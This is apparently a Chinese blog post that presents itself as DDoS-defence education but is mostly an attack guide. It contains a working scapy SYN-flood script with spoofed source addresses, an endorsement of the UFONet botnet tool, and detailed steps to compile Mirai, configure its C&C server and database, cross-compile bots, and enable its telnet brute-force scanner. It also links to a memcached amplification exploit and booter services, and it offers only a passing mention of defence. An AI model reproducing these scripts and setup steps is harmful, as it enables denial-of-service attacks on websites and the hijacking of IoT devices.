我对DDos攻击的见解以及ufonet和mirai分布式拒绝服务攻击工具的介绍
首先,我写这篇文章的目的是为了让大家更多的去了解如何防护ddos攻击,所以请勿用作违法行为!
不知攻,何知放?在我们对ddos攻击进行防御之前,一定要了解黑客是如何进行ddos攻击的。同时我今天还会为大家详细介绍一下目前新出现的mem放大以及其他主要攻击方式。
(东京的景色如何?)
一. DOS攻击
首先,拒绝服务攻击的关键是什么?是流量足够大,才可以成功。在黑客目前没有肉鸡的情况下,把流量搞到尽量最大才是重点!
1.如何保护攻击者自身的安全?
如果你是dos攻击,并且不对自己做任何保护,你的原地址肯定会暴露。两种方法:代理,伪造源地址。这里我就直接来说伪造原地址。python中有一个randip的模块,他可以随机生成ip地址。
#-- coding:utf-8 --
#by FhoeniX
import sys
from scapy.all import *def start(argv):
if len(sys.argv)<2:
print(sys.argv[0] +" <target_ip>")
sys.exit(0)
while(1):
pdst = sys.argv[1]
send(IP(src=RandIP(),dst=pdst)/TCP(dport=80,flags=“S”))#randip随机生成ip端口自己看的办
if __name__ == '__main__':
#定义异常
try:
start(sys.argv[1:])
except KeyboardInterrupt:
print("interrupted by user, killing all threads...")
这是我自己简单写的一个伪造源地址的python源码。
2. 什么是slowloris攻击?
相信平时各位肯定都听过,就是说你向服务器同时建立多个连接并且不让服务器断开,这样就会造成服务器资源耗尽。这里我就不仔细说了哈。
3. 什么是cc攻击?
cc攻击就是不断向服务器请求会耗费较大资源的应用
4.什么是放大反射?
可能各位会听过ntp放大反射攻击,这是什么呢?在其实是ntp服务器的一个漏洞。就是说你向有漏洞的ntp发送一个又问题的udp数据包,同时你把它的源地址换成目标地址。然后,ntp服务器发现你这个数据包有问题,于是ntp服务器会把这个数据包发送回去,接着服务器会查询数据包原地址,但是原地址并不是你的,而是目标网站的。所以ntp服务器会把数据包发给目标网站,而且,会造成放大的效果。
ntp放大大概有几十倍,就是说你发1k的数据包给ntp服务器,服务器会发20k的数据包给目标网站!
当然,这不算什么,真正厉害的是mem放大反射,原理和ntp差不多,都是发送udp数据包。理论上来说可以造成几万倍的放大!曾经github就是被mem攻击的。放大反射其实就是服务器的漏洞,你可以在shodan上面找到有漏洞的mem服务器,而且将近10万台。
下面给各位展示一下我自己写的反射工具–fhoenix(这里我用了etherape进行流量监控,酷不酷?)
二. DDOS攻击
这里我也不想多说了,各位想一想,如果黑客命令自己的肉鸡去放大反射会怎么样?但是现在我国已经清除了不少mem放大反射源。而且现在又有各种五花八门的什么云清洗,什么高防。。。。。
三. 僵尸网络工具–ufonet
这是一款利用僵尸网络的ddos工具,以前我尝试过。然后某个网站几分钟之美就炸了。这个工具知道的人不多,请勿用作违反行为!我对此不负责!!!
官网:https://ufonet.03c8.net/ 主要是,这东西还支持图形界面–6666666666666.这是py编写的~
对了,这玩意还支持自己抓鸡!!!!!哦哦哦哦哦哦!!!
(图形界面最好在ubuntu运行)
四.物联网破坏者Mirai病毒
mirai今天我就来讲讲他的原理和如何搭建
1.原理
2.如何搭载mirai?
这里我建议各位用ubuntu操作系统,因为kali环境变量会有bug
一、准备
1.Mirai 使用了 C,Go 两种编程语言,使用数据库存储数据,因此提前安装需要软件如下命令:
sudo apt-getinstall git
sudo apt-getinstall gcc
sudo apt-getinstall golang
sudo apt-getinstall electric-fence
sudo apt-getinstall mysql-server mysql-client
2.下载源码
git clone https://github.com/jgamblin/Mirai-Source-Code
3.修改参数,配置CNC
cd mirai/tools && gcc enc.c -o enc.out//编译enc可执行文件,用于ip地址异或./enc.outstringcnc.changeme.com //会返回一串“\x”字符串 (其实就是加密了 cnc.changeme.com)./enc.outstringreport.changeme.com //会返回一串“\x”字符串
分别替换tables.c
文件中的18行和21行的“\x”字符串和后面的另一个参数
记得:要修改两个参数!(\x字符串和后面的长度的参数)
4.配置数据库
cd ../../scripts //进入script目录gedit db.sql //编辑大db.sql文件
添加`use mirai;如下图```
service mysql start //启动Mysql 服务cat db.sql | mysql -uroot -proot
mysql -uroot -proot //以用户名和密码都是`root`登录数据库INSERT INTO users VALUES (NULL, 'mirai-user', 'mirai-pass', 0, 0, 0, 0, -1, 1, 30, ''); //添加的用户exit //退出
修改mirai/cnc/main.go
中用户名和密码与设置的一样。修改后如下
5.配置交叉编译环境
cd .. && mkdir cross-compmile-bin //这里是在`Mirai-Source-Code`目录下新建cd cross-compile-bin
下载如下11个压缩包
wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2cd ../scripts
sudo ./cross-compile.sh
编译过程会提示是否安装 mysql,选否就可以
gedit ~/.bashrc //打开环境变量
把以下放到最后
source ~/.bashrc //刷新环境变量
6.编译CNC 和bot
go getgithub.com/go-sql-driver/mysql
go getgithub.com/mattn/go-shellwords
cd ../mirai
./build.sh debug telnet
cd ../loader
./build.sh
至此环境全部配置完成。
二、说明
设备情况:
电脑A:作为第一个被感染的设备。在48101端口运行./mirai.dbg
进行扫描爆破。
电脑B:作为CNC&Loader。
CNC时:在分别在23和101 端口运行./cnc
发送攻击指令、与bot保持连接。
Loader时:在48101端口运行./scanList
持续监听。
连接情况:
1 电脑 A、B通过wifi连接宿舍局域网。
2 摄像头A、B利用交换机与宿舍路由器连接。
最终就是保证四台设备要在同一网络下,能够相互连接。
三、测试
1.还需要一点调整
由于cnc启动是在/debug/cnc
目录下进行的,但是源码里写的是绝对路经。(如下图)
所以我们把mirai
目录下的prompt.txt
移动到/debug/cnc
下。
2.启动CNC (电脑B)
go build -o debug/cnc cnc/*.go //在mirai 目录下运行
./debug/cnc
再新开一个终端尝试连接 (可能需要管理员权限)
telnet cnc.change.com 23
得到如下提示后再按一下回车,输入用户名密码登录
得到下图反馈表示登录成功!
3 启动loader (电脑B)
cd mirai/debug
sudo ./scanListen
通过查看48101端口是可以看到该端口在运行该程序
netstat -lput //查看端口指令
4 启动扫描程序 (电脑A)
由于源码默认在 debug 模式中关闭了 scanner 功能,将bot/main.c 中157行和162行注释后即可运行。
之后重新编译运行即可
在mirai
目录下运行如下
./build.sh debug telnet
在mirai/debug
目录下运行如下(这里注意一定要用管理员权限进行)
sudo ./mirai.dbg
则会开始扫描如下:
5
控制扫描ip
由于源码中是随机找一个ip进行爆破
(mirai/bot/scanner.c
674行起),修改代码后暂时可以固定一位ip地址扫描。修改后固定第一位为‘10’,结果如下:
好了,下面来展示一下
nice~
(日本挺漂亮滴)
五.目前主流的botnet以及其他…
目前主流ddos僵尸网络病毒名称: mirai,billgates,mayday,gafgyt,booter,stresser
挖矿病毒:https://github.com/xmrig
bootnet合集: top10booters.com
dns flood attack : netstress-ng
mem攻击:https://github.com/649/Memcrashed-DDoS-Exploit
(还不快给我点个赞!!!!!!!!!!!!!!!!!!!!!!!!)
当然,我们面对ddos当然是可以防御的,就比如云清洗
当然,我们面对ddos当然是可以防御的,就比如云清洗。我写这篇文章的目的是为了让大家更多的去了解如何防护ddos攻击,
最后
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
因篇幅有限,仅展示部分资料,有需要的小伙伴,可以【扫下方二维码】免费领取:
我对DDos攻击的见解以及ufonet和mirai分布式拒绝服务攻击工具的介绍相关推荐
- DDoS攻击详解ufonet、Mirai分布式拒绝服务攻击工具的介绍
前言 大家好.今天和大家聊聊DDoS攻击 首先,我写这篇文章的目的是为了让大家更多的去了解如何防护DDoS攻击,所以请勿用作违法行为! 不知攻,何知防?在我们对DDoS攻击进行防御之前,一定要了解骇客 ...
- DDoS分布式拒绝服务攻击简介
分布式拒绝服务攻击可以使很多的计算机在同一时间遭受到攻击,使攻击的目标无法正常使用,分布式拒绝服务攻击已经出现了很多次,导致很多的大型网站都出现了无法进行操作的情况,这样不仅仅会影响用户的正常使用,同 ...
- 分布式拒绝服务攻击(DDoS)原理及防范
转自:http://www.cnblogs.com/rootq/archive/2009/11/06/1597215.html http://www.ibm.com/developerworks/cn ...
- DRDoS(memcache漏洞导致的反射型分布式拒绝服务攻击)
一.DDoS基础 见博文:DDoS攻击与防御 二.Memcached 反射DDOS攻击原理 反射DDOS是发送大量带有被害者IP地址的请求给反射服务器,反射服务器对IP地址源做出大量回应,形成拒绝服务 ...
- 【计算机网络】网络安全 : 计算机网络安全威胁 ( 四种网络攻击类型 | 主动攻击与被动攻击 | 分布式拒绝服务攻击 DDos | 恶意程序 | 计算机网络安全目标)
文章目录 一.网络安全内容 二.四种网络攻击 三.被动攻击 与 主动攻击 四.分布式拒绝服务 DDos 五.恶意程序 六.计算机网络安全目标 一.网络安全内容 网络安全内容 : 网络安全概述 对称加密 ...
- 计算机网络】网络安全 : 计算机网络安全威胁 ( 四种网络攻击类型 | 主动攻击与被动攻击 | 分布式拒绝服务攻击 DDos | 恶意程序 | 计算机网络安全目标)
一.网络安全内容 网络安全内容 : 网络安全概述 对称加密 和 非对称加密 体质 数字签名 因特网安全协议 链路加密 与 端到端加密 防火墙 二.四种网络攻击 四种网络攻击 : ① 截获 : 窃听 其 ...
- 拒绝服务攻击/分布式拒绝服务攻击
拒绝服务(Denial of Service,简称DoS) 是一种简单的破坏性攻击.通常是利用传输协议下的某个弱点.系统存在的漏洞.或服务器的漏洞.对目标系统发起大规模的进攻.用超出目标处理能力的海量 ...
- DDoS(Distributed Denial of Service,分布式拒绝服务)
DDoS:Distributed Denial of Service,即分布式拒绝服务攻击. 借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高 ...
- ICMP拒绝服务攻击(原始套接字系列四)
拒绝服务攻击(DoS)企图通过使被攻击的计算机资源消耗殆尽从而不能再提供服务,拒绝服务攻击是最容易实施的攻击行为.中美黑客大战中的中国黑客一般对美进行的就是拒绝服务攻击,其技术手段大多不够高明. IC ...
最新文章
- 在 Delphi 下使用 DirectSound (12): 测试失真效果器 IDirectSoundFXDistortion8
- 切换tab页时,tab页中的echart变形问题
- linux命令窗口颜色,如何修改ssh命令行下登录时的颜色
- [poj3261]Milk Patterns
- PHP开发的爱情盲盒交友系统网站源码
- Stopwatch示例
- linux的vi编辑器的dd命令,linux vi 后dd命令
- ResNet网络结构详解(Tensorflow2.6.0实现网络结构)
- 批量导出docker images 批量导入docker镜像
- java语音转文字_快速实现语音转文字,还自带翻译
- 马云 996 一文的诡辩与话术:大家是怎么被洗脑还帮人数钱的
- 戾气遍地的社会,我们该如何远离垃圾人?(深度)
- 大神级DIY作品:运动跟随大眼睛,软件硬件结构一个都不能少
- JAVA——JSch
- 使用fiddler代替charles将react中的axios请求重定向到本地文件,兼容谷歌浏览器chrome
- 深度学习笔记(五) 代价函数的梯度求解过程和方法
- Aras Innovator Method集成Visual Studio
- 一般的Java项目需要JVM调优吗?
- html5本地数据库 没有用,【HTML5初探之本地存储】如果没有数据库。。。
- netty之心跳机制